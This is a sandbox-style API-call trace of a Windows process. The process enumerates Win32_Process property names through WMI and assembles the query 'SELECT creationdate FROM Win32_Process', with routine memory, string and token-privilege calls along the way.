[0401.610] IWbemClassObject:Get (in: This=0x3390a0, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Status", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TerminationDate", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.611] free (_Block=0x209680)
[0401.611] malloc (_Size=0x18) returned 0x209680
[0401.611] lstrlenW (lpString="TerminationDate") returned 15
[0401.611] lstrlenW (lpString="creationdate") returned 12
[0401.611] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="TerminationDate", cchCount2=15) returned 1
[0401.611] free (_Block=0x209680)
[0401.611] IUnknown:Release (This=0x3390a0) returned 0x1
[0401.611] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.611] malloc (_Size=0x18) returned 0x209680
[0401.611] IWbemClassObject:Get (in: This=0x339350, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="TerminationDate", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ThreadCount", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.611] free (_Block=0x209680)
[0401.611] malloc (_Size=0x18) returned 0x209680
[0401.611] IWbemClassObject:Get (in: This=0x339350, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TerminationDate", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ThreadCount", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.612] free (_Block=0x209680)
[0401.612] malloc (_Size=0x18) returned 0x209680
[0401.612] lstrlenW (lpString="ThreadCount") returned 11
[0401.612] lstrlenW (lpString="creationdate") returned 12
[0401.612] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="ThreadCount", cchCount2=11) returned 1
[0401.612] free (_Block=0x209680)
[0401.612] IUnknown:Release (This=0x339350) returned 0x1
[0401.612] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.612] malloc (_Size=0x18) returned 0x209680
[0401.612] IWbemClassObject:Get (in: This=0x339600, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="ThreadCount", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="UserModeTime", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.612] free (_Block=0x209680)
[0401.612] malloc (_Size=0x18) returned 0x209680
[0401.613] IWbemClassObject:Get (in: This=0x339600, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ThreadCount", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="UserModeTime", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.613] free (_Block=0x209680)
[0401.613] malloc (_Size=0x18) returned 0x209680
[0401.613] lstrlenW (lpString="UserModeTime") returned 12
[0401.613] lstrlenW (lpString="creationdate") returned 12
[0401.613] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="UserModeTime", cchCount2=12) returned 1
[0401.613] free (_Block=0x209680)
[0401.613] IUnknown:Release (This=0x339600) returned 0x1
[0401.613] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.613] malloc (_Size=0x18) returned 0x209680
[0401.613] IWbemClassObject:Get (in: This=0x3398b0, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="UserModeTime", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="VirtualSize", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.614] free (_Block=0x209680)
[0401.614] malloc (_Size=0x18) returned 0x209680
[0401.614] IWbemClassObject:Get (in: This=0x3398b0, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="UserModeTime", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VirtualSize", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.614] free (_Block=0x209680)
[0401.614] malloc (_Size=0x18) returned 0x209680
[0401.614] lstrlenW (lpString="VirtualSize") returned 11
[0401.614] lstrlenW (lpString="creationdate") returned 12
[0401.614] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="VirtualSize", cchCount2=11) returned 1
[0401.614] free (_Block=0x209680)
[0401.614] IUnknown:Release (This=0x3398b0) returned 0x1
[0401.614] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.614] malloc (_Size=0x18) returned 0x209680
[0401.615] IWbemClassObject:Get (in: This=0x339b60, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="VirtualSize", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="WindowsVersion", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.615] free (_Block=0x209680)
[0401.615] malloc (_Size=0x18) returned 0x209680
[0401.615] IWbemClassObject:Get (in: This=0x339b60, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VirtualSize", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="WindowsVersion", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.615] free (_Block=0x209680)
[0401.615] malloc (_Size=0x18) returned 0x209680
[0401.615] lstrlenW (lpString="WindowsVersion") returned 14
[0401.615] lstrlenW (lpString="creationdate") returned 12
[0401.615] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="WindowsVersion", cchCount2=14) returned 1
[0401.615] free (_Block=0x209680)
[0401.615] IUnknown:Release (This=0x339b60) returned 0x1
[0401.616] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.616] malloc (_Size=0x18) returned 0x209680
[0401.616] IWbemClassObject:Get (in: This=0x339e10, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="WindowsVersion", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="WorkingSetSize", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.616] free (_Block=0x209680)
[0401.616] malloc (_Size=0x18) returned 0x209680
[0401.616] IWbemClassObject:Get (in: This=0x339e10, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="WindowsVersion", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="WorkingSetSize", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.616] free (_Block=0x209680)
[0401.616] malloc (_Size=0x18) returned 0x209680
[0401.616] lstrlenW (lpString="WorkingSetSize") returned 14
[0401.616] lstrlenW (lpString="creationdate") returned 12
[0401.616] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="WorkingSetSize", cchCount2=14) returned 1
[0401.617] free (_Block=0x209680)
[0401.617] IUnknown:Release (This=0x339e10) returned 0x1
[0401.617] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.617] malloc (_Size=0x18) returned 0x209680
[0401.617] IWbemClassObject:Get (in: This=0x33a0c0, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="WorkingSetSize", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="WriteOperationCount", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.617] free (_Block=0x209680)
[0401.617] malloc (_Size=0x18) returned 0x209680
[0401.617] IWbemClassObject:Get (in: This=0x33a0c0, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="WorkingSetSize", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="WriteOperationCount", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.617] free (_Block=0x209680)
[0401.617] malloc (_Size=0x18) returned 0x209680
[0401.617] lstrlenW (lpString="WriteOperationCount") returned 19
[0401.617] lstrlenW (lpString="creationdate") returned 12
[0401.617] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="WriteOperationCount", cchCount2=19) returned 1
[0401.618] free (_Block=0x209680)
[0401.618] IUnknown:Release (This=0x33a0c0) returned 0x1
[0401.618] SafeArrayGetElement (in: psa=0x2e95c0, rgIndices=0x16f178, pv=0x16f128 | out: pv=0x16f128) returned 0x0
[0401.618] malloc (_Size=0x18) returned 0x209680
[0401.618] IWbemClassObject:Get (in: This=0x33a370, wszName="Name", lFlags=0, pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="WriteOperationCount", varVal2=0xffa48408), pType=0x0, plFlavor=0x0 | out: pVal=0x16f228*(varType=0x8, wReserved1=0x802, wReserved2=0x0, wReserved3=0x0, varVal1="WriteTransferCount", varVal2=0xffa48408), pType=0x0, plFlavor=0x0) returned 0x0
[0401.618] free (_Block=0x209680)
[0401.619] malloc (_Size=0x18) returned 0x209680
[0401.620] IWbemClassObject:Get (in: This=0x33a370, wszName="Derivation", lFlags=0, pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="WriteOperationCount", varVal2=0xffa33668), pType=0x0, plFlavor=0x0 | out: pVal=0x16f240*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="WriteTransferCount", varVal2=0xffa33668), pType=0x0, plFlavor=0x0) returned 0x0
[0401.620] free (_Block=0x209680)
[0401.620] malloc (_Size=0x18) returned 0x209680
[0401.620] lstrlenW (lpString="WriteTransferCount") returned 18
[0401.620] lstrlenW (lpString="creationdate") returned 12
[0401.620] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="WriteTransferCount", cchCount2=18) returned 1
[0401.620] free (_Block=0x209680)
[0401.620] IUnknown:Release (This=0x33a370) returned 0x1
[0401.620] IUnknown:Release (This=0x2c96a0) returned 0x1
[0401.624] IUnknown:Release (This=0x2c8c70) returned 0x0
[0401.624] free (_Block=0x209660)
[0401.624] ??1CHString@@QEAA@XZ () returned 0x7fef4e0c96c
[0401.624] free (_Block=0x20ce80)
[0401.624] malloc (_Size=0x70) returned 0x20ce80
[0401.624] malloc (_Size=0x8) returned 0x20cf00
[0401.624] malloc (_Size=0x18) returned 0x209660
[0401.625] SysStringLen (param_1="creationdate") returned 0xc
[0401.625] malloc (_Size=0x1a) returned 0x20cf20
[0401.625] SysStringLen (param_1="creationdate") returned 0xc
[0401.625] malloc (_Size=0x8) returned 0x20cf50
[0401.625] free (_Block=0x209660)
[0401.625] free (_Block=0x20ce30)
[0401.625] lstrlenW (lpString="creationdate") returned 12
[0401.625] malloc (_Size=0x1a) returned 0x20ce30
[0401.625] lstrlenW (lpString="creationdate") returned 12
[0401.625] free (_Block=0x20cf20)
[0401.625] free (_Block=0x20cf50)
[0401.625] free (_Block=0x20cf00)
[0401.626] free (_Block=0x20ce80)
[0401.626] lstrlenW (lpString="Select * from Win32_Process") returned 27
[0401.626] malloc (_Size=0x38) returned 0x2086c0
[0401.626] lstrlenW (lpString="Select * from Win32_Process") returned 27
[0401.626] wcstok (in: _String="Select * from Win32_Process", _Delimiter=" ", _Context=0xffffffffffffff80 | out: _String="Select", _Context=0xffffffffffffff80) returned="Select"
[0401.626] malloc (_Size=0x18) returned 0x209660
[0401.626] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x0 | out: _String=0x0, _Context=0x0) returned="*"
[0401.626] lstrlenW (lpString="FROM") returned 4
[0401.626] lstrlenW (lpString="*") returned 1
[0401.626] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1
[0401.626] malloc (_Size=0x18) returned 0x209680
[0401.626] free (_Block=0x209660)
[0401.627] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x2000fe006e0009 | out: _String=0x0, _Context=0x2000fe006e0009) returned="from"
[0401.627] lstrlenW (lpString="FROM") returned 4
[0401.627] lstrlenW (lpString="from") returned 4
[0401.627] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2
[0401.627] malloc (_Size=0x18) returned 0x209660
[0401.627] free (_Block=0x209680)
[0401.627] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x2000ff006e0009 | out: _String=0x0, _Context=0x2000ff006e0009) returned="Win32_Process"
[0401.627] malloc (_Size=0x18) returned 0x209680
[0401.627] free (_Block=0x209660)
[0401.627] free (_Block=0x2086c0)
[0401.627] free (_Block=0x209680)
[0401.627] lstrlenW (lpString="SET") returned 3
[0401.628] lstrlenW (lpString="get") returned 3
[0401.628] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="SET", cchCount2=3) returned 1
[0401.628] lstrlenW (lpString="CREATE") returned 6
[0401.628] lstrlenW (lpString="get") returned 3
[0401.628] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="CREATE", cchCount2=6) returned 3
[0401.628] free (_Block=0x20cce0)
[0401.628] malloc (_Size=0x8) returned 0x20cce0
[0401.628] lstrlenW (lpString="GET") returned 3
[0401.628] lstrlenW (lpString="get") returned 3
[0401.628] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="GET", cchCount2=3) returned 2
[0401.628] free (_Block=0x2095a0)
[0401.628] malloc (_Size=0x18) returned 0x2095a0
[0401.629] free (_Block=0x209580)
[0401.629] malloc (_Size=0x18) returned 0x209580
[0401.629] ??0CHString@@QEAA@XZ () returned 0x16f788
[0401.629] malloc (_Size=0x18) returned 0x209680
[0401.629] malloc (_Size=0x20) returned 0x20ce80
[0401.629] memcpy_s (in: _Destination=0x20ce80, _DestinationSize=0x1e, _Source=0x2e4c58, _SourceSize=0x14 | out: _Destination=0x20ce80) returned 0x0
[0401.629] lstrlenW (lpString="&") returned 1
[0401.629] lstrlenW (lpString="&") returned 5
[0401.629] lstrlenW (lpString="<") returned 1
[0401.629] lstrlenW (lpString="<") returned 4
[0401.629] lstrlenW (lpString=">") returned 1
[0401.630] lstrlenW (lpString=">") returned 4
[0401.630] lstrlenW (lpString="'") returned 1
[0401.630] lstrlenW (lpString="'") returned 6
[0401.630] lstrlenW (lpString="\"") returned 1
[0401.630] lstrlenW (lpString=""") returned 6
[0401.630] malloc (_Size=0x18) returned 0x209660
[0401.630] free (_Block=0x209680)
[0401.630] free (_Block=0x20ce80)
[0401.630] ?Format@CHString@@QEAAXPEBGZZ () returned 0x20ce8c
[0401.631] malloc (_Size=0x18) returned 0x209680
[0401.631] malloc (_Size=0x18) returned 0x2096c0
[0401.631] SysStringLen (param_1="") returned 0x0
[0401.631] SysStringLen (param_1="") returned 0x1b
[0401.631] memcpy (in: _Dst=0x2c62c8, _Src=0x2bf748, _Size=0x2 | out: _Dst=0x2c62c8) returned 0x2c62c8
[0401.631] memcpy (in: _Dst=0x2c62c8, _Src=0x2c6228, _Size=0x38 | out: _Dst=0x2c62c8) returned 0x2c62c8
[0401.631] free (_Block=0x209580)
[0401.631] free (_Block=0x209680)
[0401.631] free (_Block=0x209660)
[0401.631] ??1CHString@@QEAA@XZ () returned 0x55f9f701
[0401.631] WbemLocator:IUnknown:AddRef (This=0x26cc20) returned 0x3
[0401.631] free (_Block=0x207fa0)
[0401.632] lstrlenW (lpString="") returned 0
[0401.632] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0401.632] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Q9IATRKPRH", cchCount1=10, lpString2="", cchCount2=0) returned 3
[0401.632] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0401.632] malloc (_Size=0x16) returned 0x209660
[0401.632] lstrlenW (lpString="Q9IATRKPRH") returned 10
[0401.632] GetCurrentThreadId () returned 0xdf0
[0401.632] GetCurrentProcess () returned 0xffffffffffffffff
[0401.632] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x16f600 | out: TokenHandle=0x16f600*=0x268) returned 1
[0401.632] GetTokenInformation (in: TokenHandle=0x268, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x16f5f8 | out: TokenInformation=0x0, ReturnLength=0x16f5f8) returned 0
[0401.632] malloc (_Size=0x40) returned 0x20ce80
[0401.632] GetTokenInformation (in: TokenHandle=0x268, TokenInformationClass=0x3, TokenInformation=0x20ce80, TokenInformationLength=0x40, ReturnLength=0x16f5f8 | out: TokenInformation=0x20ce80, ReturnLength=0x16f5f8) returned 1
[0401.632] AdjustTokenPrivileges (in: TokenHandle=0x268, DisableAllPrivileges=0, NewState=0x20ce80*(PrivilegesCount=0x5, Privileges=((Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=3, Attributes=0x19), (Luid.LowPart=0x2, Luid.HighPart=33, Attributes=0x0), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x64006e, Luid.HighPart=1190786062, Attributes=0x9852))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
[0401.633] free (_Block=0x20ce80)
[0401.633] CloseHandle (hObject=0x268) returned 1
[0401.633] lstrlenW (lpString="GET") returned 3
[0401.633] lstrlenW (lpString="get") returned 3
[0401.633] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="GET", cchCount2=3) returned 2
[0401.633] malloc (_Size=0x18) returned 0x209680
[0401.633] lstrlenA (lpString="") returned 0
[0401.633] malloc (_Size=0x2) returned 0x207fa0
[0401.633] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="", cbMultiByte=-1, lpWideCharStr=0x207fa0, cchWideChar=1 | out: lpWideCharStr="") returned 1
[0401.634] free (_Block=0x207fa0)
[0401.634] malloc (_Size=0x18) returned 0x209580
[0401.634] lstrlenA (lpString="") returned 0
[0401.634] malloc (_Size=0x2) returned 0x207fa0
[0401.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="", cbMultiByte=-1, lpWideCharStr=0x207fa0, cchWideChar=1 | out: lpWideCharStr="") returned 1
[0401.634] free (_Block=0x207fa0)
[0401.634] malloc (_Size=0x18) returned 0x209640
[0401.634] lstrlenA (lpString="") returned 0
[0401.634] malloc (_Size=0x2) returned 0x207fa0
[0401.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="", cbMultiByte=-1, lpWideCharStr=0x207fa0, cchWideChar=1 | out: lpWideCharStr="") returned 1
[0401.634] free (_Block=0x207fa0)
[0401.635] malloc (_Size=0x18) returned 0x209760
[0401.635] lstrlenA (lpString="") returned 0
[0401.635] malloc (_Size=0x2) returned 0x207fa0
[0401.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="", cbMultiByte=-1, lpWideCharStr=0x207fa0, cchWideChar=1 | out: lpWideCharStr="") returned 1
[0401.635] free (_Block=0x207fa0)
[0401.635] malloc (_Size=0x18) returned 0x2096e0
[0401.635] malloc (_Size=0x18) returned 0x209700
[0401.635] SysStringLen (param_1="") returned 0x0
[0401.635] SysStringLen (param_1="creationdate") returned 0xc
[0401.635] memcpy (in: _Dst=0x2e9478, _Src=0x2e4c58, _Size=0x2 | out: _Dst=0x2e9478) returned 0x2e9478
[0401.635] memcpy (in: _Dst=0x2e9478, _Src=0x2c6228, _Size=0x1a | out: _Dst=0x2e9478) returned 0x2e9478
[0401.635] free (_Block=0x209680)
[0401.636] free (_Block=0x2096e0)
[0401.636] lstrlenW (lpString="__CLASS") returned 7
[0401.636] lstrlenW (lpString="creationdate") returned 12
[0401.636] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="__CLASS", cchCount2=7) returned 3
[0401.636] lstrlenW (lpString="__DERIVATION") returned 12
[0401.636] lstrlenW (lpString="creationdate") returned 12
[0401.636] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="__DERIVATION", cchCount2=12) returned 3
[0401.636] lstrlenW (lpString="__DYNASTY") returned 9
[0401.636] lstrlenW (lpString="creationdate") returned 12
[0401.636] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="__DYNASTY", cchCount2=9) returned 3
[0401.636] lstrlenW (lpString="__GENUS") returned 7
[0401.636] lstrlenW (lpString="creationdate") returned 12
[0401.636] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="__GENUS", cchCount2=7) returned 3
[0401.636] lstrlenW (lpString="__NAMESPACE") returned 11
[0401.636] lstrlenW (lpString="creationdate") returned 12
[0401.637] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="__NAMESPACE", cchCount2=11) returned 3
[0401.637] lstrlenW (lpString="__PATH") returned 6
[0401.637] lstrlenW (lpString="creationdate") returned 12
[0401.637] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="__PATH", cchCount2=6) returned 3
[0401.637] lstrlenW (lpString="__PROPERTYCOUNT") returned 15
[0401.637] lstrlenW (lpString="creationdate") returned 12
[0401.637] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="__PROPERTYCOUNT", cchCount2=15) returned 3
[0401.637] lstrlenW (lpString="__RELPATH") returned 9
[0401.637] lstrlenW (lpString="creationdate") returned 12
[0401.637] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="__RELPATH", cchCount2=9) returned 3
[0401.637] lstrlenW (lpString="__SERVER") returned 8
[0401.637] lstrlenW (lpString="creationdate") returned 12
[0401.637] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="__SERVER", cchCount2=8) returned 3
[0401.637] lstrlenW (lpString="__SUPERCLASS") returned 12
[0401.637] lstrlenW (lpString="creationdate") returned 12
[0401.637] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="__SUPERCLASS", cchCount2=12) returned 3
[0401.637] lstrlenW (lpString="Select * from Win32_Process") returned 27
[0401.638] malloc (_Size=0x38) returned 0x2086c0
[0401.638] lstrlenW (lpString="Select * from Win32_Process") returned 27
[0401.638] wcstok (in: _String="Select * from Win32_Process", _Delimiter=" ", _Context=0xffffffffffffff80 | out: _String="Select", _Context=0xffffffffffffff80) returned="Select"
[0401.638] malloc (_Size=0x18) returned 0x2096e0
[0401.638] free (_Block=0x209580)
[0401.638] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x20010a006a0005 | out: _String=0x0, _Context=0x20010a006a0005) returned="*"
[0401.638] lstrlenW (lpString="FROM") returned 4
[0401.638] lstrlenW (lpString="*") returned 1
[0401.638] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1
[0401.638] malloc (_Size=0x18) returned 0x209580
[0401.638] free (_Block=0x2096e0)
[0401.638] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x20010b006a0005 | out: _String=0x0, _Context=0x20010b006a0005) returned="from"
[0401.639] lstrlenW (lpString="FROM") returned 4
[0401.639] lstrlenW (lpString="from") returned 4
[0401.639] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2
[0401.639] malloc (_Size=0x18) returned 0x2096e0
[0401.639] free (_Block=0x209580)
[0401.639] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x20010c006a0005 | out: _String=0x0, _Context=0x20010c006a0005) returned="Win32_Process"
[0401.639] malloc (_Size=0x18) returned 0x209580
[0401.639] free (_Block=0x2096e0)
[0401.639] free (_Block=0x2086c0)
[0401.639] malloc (_Size=0x18) returned 0x2096e0
[0401.639] lstrlenA (lpString=" FROM ") returned 6
[0401.639] malloc (_Size=0xe) returned 0x209680
[0401.639] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" FROM ", cbMultiByte=-1, lpWideCharStr=0x209680, cchWideChar=7 | out: lpWideCharStr=" FROM ") returned 7
[0401.640] free (_Block=0x209680)
[0401.640] malloc (_Size=0x18) returned 0x209680
[0401.640] lstrlenA (lpString="SELECT ") returned 7
[0401.640] malloc (_Size=0x10) returned 0x209720
[0401.640] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="SELECT ", cbMultiByte=-1, lpWideCharStr=0x209720, cchWideChar=8 | out: lpWideCharStr="SELECT ") returned 8
[0401.640] free (_Block=0x209720)
[0401.640] malloc (_Size=0x18) returned 0x209720
[0401.640] SysStringLen (param_1="SELECT ") returned 0x7
[0401.640] SysStringLen (param_1="creationdate") returned 0xc
[0401.640] memcpy (in: _Dst=0x2e95b8, _Src=0x2c84f8, _Size=0x10 | out: _Dst=0x2e95b8) returned 0x2e95b8
[0401.640] memcpy (in: _Dst=0x2e95c6, _Src=0x2e9478, _Size=0x1a | out: _Dst=0x2e95c6) returned 0x2e95c6
[0401.641] malloc (_Size=0x18) returned 0x209740
[0401.641] SysStringLen (param_1="SELECT creationdate") returned 0x13
[0401.641] SysStringLen (param_1=" FROM ") returned 0x6
[0401.641] memcpy (in: _Dst=0x2c6638, _Src=0x2e95b8, _Size=0x28 | out: _Dst=0x2c6638) returned 0x2c6638
[0401.641] memcpy (in: _Dst=0x2c665e, _Src=0x2e4c58, _Size=0xe | out: _Dst=0x2c665e) returned 0x2c665e
[0401.641] malloc (_Size=0x18) returned 0x209780
[0401.641] SysStringLen (param_1="SELECT creationdate FROM ") returned 0x19
[0401.641] SysStringLen (param_1="Win32_Process") returned 0xd
[0401.641] memcpy (in: _Dst=0x2a6ed8, _Src=0x2c6638, _Size=0x34 | out: _Dst=0x2a6ed8) returned 0x2a6ed8
[0401.641] memcpy (in: _Dst=0x2a6f0a, _Src=0x2c6228, _Size=0x1c | out: _Dst=0x2a6f0a) returned 0x2a6f0a
[0401.641] free (_Block=0x209640)
[0401.641] free (_Block=0x209740)
[0401.642] free (_Block=0x209720)
[0401.642] free (_Block=0x209680)
[0401.642] free (_Block=0x2096e0)
[0401.642] malloc (_Size=0x18) returned 0x2096e0
[0401.642] malloc (_Size=0x18) returned 0x209680
[0401.642] lstrlenA (lpString=" WHERE ") returned 7
[0401.642] malloc (_Size=0x10) returned 0x209720
[0401.642] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" WHERE ", cbMultiByte=-1, lpWideCharStr=0x209720, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8
[0401.642] free (_Block=0x209720)
[0401.642] malloc (_Size=0x18) returned 0x209720
[0401.642] SysStringLen (param_1=" WHERE ") returned 0x7
